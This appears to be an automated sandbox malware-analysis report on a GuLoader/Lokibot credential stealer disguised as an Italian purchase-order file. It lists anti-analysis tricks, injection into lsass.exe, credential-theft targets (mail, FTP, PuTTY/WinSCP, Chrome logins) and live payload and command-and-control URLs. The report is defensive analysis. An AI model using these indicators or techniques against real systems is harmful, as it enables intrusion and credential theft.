Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://FABRICRAFT.CO.ZA/FARMANT_HHVNWJNA195.BIN
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304	Thread sleep count: 335 > 30			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe TID: 3304	Thread sleep time: -20100000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Code function: 2_2_0227B36F rdtsc

2_2_0227B36F

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

System information queried: ModuleInformation

Jump to behavior

Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://fabricraft.co.za/Farmant_hhVNwJna195.bin
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp	Binary or memory string: DOMAINS\Builtin\Aliases\Names\Hyper-V Administrators
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864964902.00000000008DB000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: lsass.exe, 0000000C.00000000.238321436312.000001896A6B0000.00000004.00000001.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041116904.00000000031A0000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWp7
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238041179832.0000000003269000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238039182344.0000000000734000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866912465.00000000024F9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: lsass.exe, 0000000C.00000002.242864168995.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311349709.000001896A613000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330424875.000001896A613000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Code function: 2_2_0227B36F rdtsc

2_2_0227B36F

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227ADAD mov eax, dword ptr fs:[00000030h]	2_2_0227ADAD
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227A66D mov eax, dword ptr fs:[00000030h]	2_2_0227A66D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BE73 mov eax, dword ptr fs:[00000030h]	2_2_0227BE73
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227BE7D mov eax, dword ptr fs:[00000030h]	2_2_0227BE7D
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_0227536A mov eax, dword ptr fs:[00000030h]	2_2_0227536A
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_022757CF mov eax, dword ptr fs:[00000030h]	2_2_022757CF
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275822 mov eax, dword ptr fs:[00000030h]	2_2_02275822
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02275802 mov eax, dword ptr fs:[00000030h]	2_2_02275802
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Code function: 2_2_02277DAD mov eax, dword ptr fs:[00000030h]	2_2_02277DAD

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Code function: 2_2_02279224 LdrInitializeThunk,

2_2_02279224

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Memory written: C:\Windows\System32\lsass.exe base: 1896A5B0000			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Memory written: C:\Windows\System32\lsass.exe base: 1896B540000			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 1896A5B0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 1896B540000 protect: page execute and read and write			Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Thread created: C:\Windows\System32\lsass.exe EIP: 6A5B0000

Jump to behavior

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Process created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"

Jump to behavior

Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866195652.0000000000FF0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match

File source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Remote Access Functionality:

Yara detected Lokibot

Show sources

Source: Yara match

File source: Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection312	Masquerading1	OS Credential Dumping2	Security Software Discovery321	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion221	Credentials in Registry1	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection312	Security Account Manager	Virtualization/Sandbox Evasion221	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery4	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDINE + DDT A.M.F SpA.exe	22%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
farmanat.ro	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://farmanat.ro/arman30/five/fre.php	12%	Virustotal		Browse
https://farmanat.ro/arman30/five/fre.php	100%	Avira URL Cloud	malware
http://farmanat.ro/arman30/five/fre.php	11%	Virustotal		Browse
http://farmanat.ro/arman30/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fabricraft.co.za	197.242.150.64	true	false		high
farmanat.ro	176.223.209.128	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://farmanat.ro/arman30/five/fre.php	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://fabricraft.co.za/Farmant_hhVNwJna195.bin	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	false		high
https://fabricraft.co.za/	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	false		high
https://fabricraft.co.za/Farmant_hhVNwJna195.binn	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
https://fabricraft.co.za/.	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
https://farmanat.ro/arman30/five/fre.php	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
http://www.live.com	lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	false		high
http://www.msn.com	lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	false		high
https://fabricraft.co.za/Farmant_hhVNwJna195.binws;	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp	false		high
https://fabricraft.co.za/Farmant_hhVNwJna195.binc	ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.223.209.128	farmanat.ro	United Kingdom		39756	ROHOSTWAY-ASRO	true
197.242.150.64	fabricraft.co.za	South Africa		37611	AfrihostZA	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528460
Start date:	25.11.2021
Start time:	10:45:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDINE + DDT A.M.F SpA.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/5@3/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.54.122.82 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:48:01	API Interceptor	876x Sleep call for process: ORDINE + DDT A.M.F SpA.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
176.223.209.128	ATTACHMENT 6637268#Hydro tech BG_pdf.exe	Get hash	malicious	Browse	farmanat.ro/arman30/five/fre.php
	ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exe	Get hash	malicious	Browse	farmanat.ro/arman30/five/fre.php
	Richiesta di quotazione ISCOTRANS SPA Nr.5653.exe	Get hash	malicious	Browse	farmanat.ro/arman30/five/fre.php
	Nr_ SOFIA_587646211152021.exe	Get hash	malicious	Browse	farmanat.ro/arman30/five/fre.php
	SOFIA_BG PROJECT Nr_534427355.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
	Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
	SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
